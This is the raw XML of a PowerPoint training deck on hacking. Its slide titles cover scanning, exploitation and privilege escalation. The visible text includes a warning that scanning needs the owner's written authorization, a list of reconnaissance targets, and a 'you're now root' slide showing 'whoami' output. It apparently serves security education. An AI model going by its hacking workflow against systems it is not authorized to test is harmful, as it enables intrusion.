              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1"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292608" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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065475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7CCCB0-0F31-8347-A5B7-5DC897336EC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492369" y="605896"/>
            <a:ext cx="2288931" cy="5646208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Esc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3035300" y="0"/>
            <a:ext cx="9055099" cy="6858000"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="292608" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hacked!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="292608" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>You’re now root.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="292608" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="292608" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="292608" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">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BF36C6C6-9C89-1943-AF65-1BB2B93B6CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6413679" y="3567448"/>
            <a:ext cx="2826913" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71850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94495-E6A2-F94D-AD68-0B703F8B5837}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036320" y="286603"/>
            <a:ext cx="10058400" cy="1450757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800"/>
              <a:t>DO NOT TRY THIS AT WORK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45" name="Straight Connector 44">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7" name="Graphic 26" descr="Irritant">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC9B23CC-EEDC-4C19-B228-1269EAF9D3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509" y="2472903"/>
            <a:ext cx="3031484" cy="3031484"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rectangle 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4CE3CF-6887-4947-8090-EC10F183F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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C7637DE-7ECE-C144-822C-F07431EFCB66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4483329" y="2109391"/>
            <a:ext cx="5947029" cy="3760891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="0" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Scanning &amp; Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Should never be done without written authorization from owner and a clear definition of scope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Can have impact the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Will cause alerts in the CSOC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Can be considered criminal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphic 3" descr="House">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62A403E6-7089-5D48-82F8-8A3C20EC13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7633" y="3320806"/>
            <a:ext cx="2763020" cy="2763020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5" descr="Magnifying glass">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{922E187F-C7EB-8D45-B694-72685D44AC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201594">
            <a:off x="5806598" y="4669189"/>
            <a:ext cx="632601" cy="632601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic 7" descr="Man">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63290614-043B-F14F-8030-DDE10C34C9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3102" y="4312612"/>
            <a:ext cx="1460016" cy="1460016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3716481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B85931-F905-9A47-89CB-FFB16410049C}"/>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Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Connector 17">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358C87-C1A5-9742-8E57-F83EBB00F4EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097279" y="2505069"/>
            <a:ext cx="5977938" cy="2981332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Processes of learning everything we can about the target from the outside.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exposed Ports </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Services and Versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Webpages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Possible Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E85BB25E-96AF-CE4D-BE72-C2963F63F4FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8251982" y="1952555"/>
            <a:ext cx="3294253" cy="2931097"/>
            <a:chOff x="1263745" y="3062078"/>
            <a:chExt cx="2930000" cy="2606999"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4428452-104C-6547-B4CB-20030386B85F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1699312" y="3195331"/>
              <a:ext cx="1735867" cy="2340495"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFF87799-01FB-EA44-9DE6-E0393FAC6D4A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1263745" y="3062078"/>
              <a:ext cx="2606999" cy="2606999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B159E7-DBE1-9241-B71A-6FFE6EE62871}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect l="60029" t="37501" r="13975" b="45206"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2567246" y="4102444"/>
              <a:ext cx="867934" cy="778476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Picture 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{725850E5-3D65-CE4E-ADBB-F119981C7A56}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2355334" y="3797422"/>
              <a:ext cx="1838411" cy="1838411"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1083634193"/>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43741"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E8E2E2"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="2FB1BB"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="2578C7"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="4352DB"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="7245CF"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="AE37D9"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="C725AE"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="C75F58"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="7F7F7F"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Retrospect">
      <a:majorFont>
        <a:latin typeface="Bahnschrif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ews Gothic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4720</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>935</Paragraphs>
  <Slides>78</Slides>
  <Notes>71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Bahnschrift</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>News Gothic MT</vt:lpstr>
      <vt:lpstr>RetrospectVTI</vt:lpstr>
      <vt:lpstr>Hacking</vt:lpstr>
      <vt:lpstr>Introduction &amp; Agenda</vt:lpstr>
      <vt:lpstr>About Me</vt:lpstr>
      <vt:lpstr>The Process</vt:lpstr>
      <vt:lpstr>The Process</vt:lpstr>
      <vt:lpstr>DO NOT TRY THIS AT WORK</vt:lpstr>
      <vt:lpstr>DO NOT TRY THIS AT WORK</vt:lpstr>
      <vt:lpstr>DO NOT TRY THIS AT WORK</vt:lpstr>
      <vt:lpstr>Scanning</vt:lpstr>
      <vt:lpstr>Scanning</vt:lpstr>
      <vt:lpstr>Scanning</vt:lpstr>
      <vt:lpstr>Scanning</vt:lpstr>
      <vt:lpstr>Scanning</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Exploitation</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Privilege Escalation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Lunch Time Challenge!</vt:lpstr>
      <vt:lpstr>Let’s Hack!</vt:lpstr>
      <vt:lpstr>Scanning</vt:lpstr>
      <vt:lpstr>Scanning</vt:lpstr>
      <vt:lpstr>Scanning</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc</vt:lpstr>
      <vt:lpstr>Priv Esc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Hacking</dc:title>
  <dc:creator>Anthony Pipia</dc:creator>
  <cp:lastModifiedBy>Anthony Pipia</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-21T16:19:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-21T16:34:08Z</dcterms:modified>
</cp:coreProperties>
</file>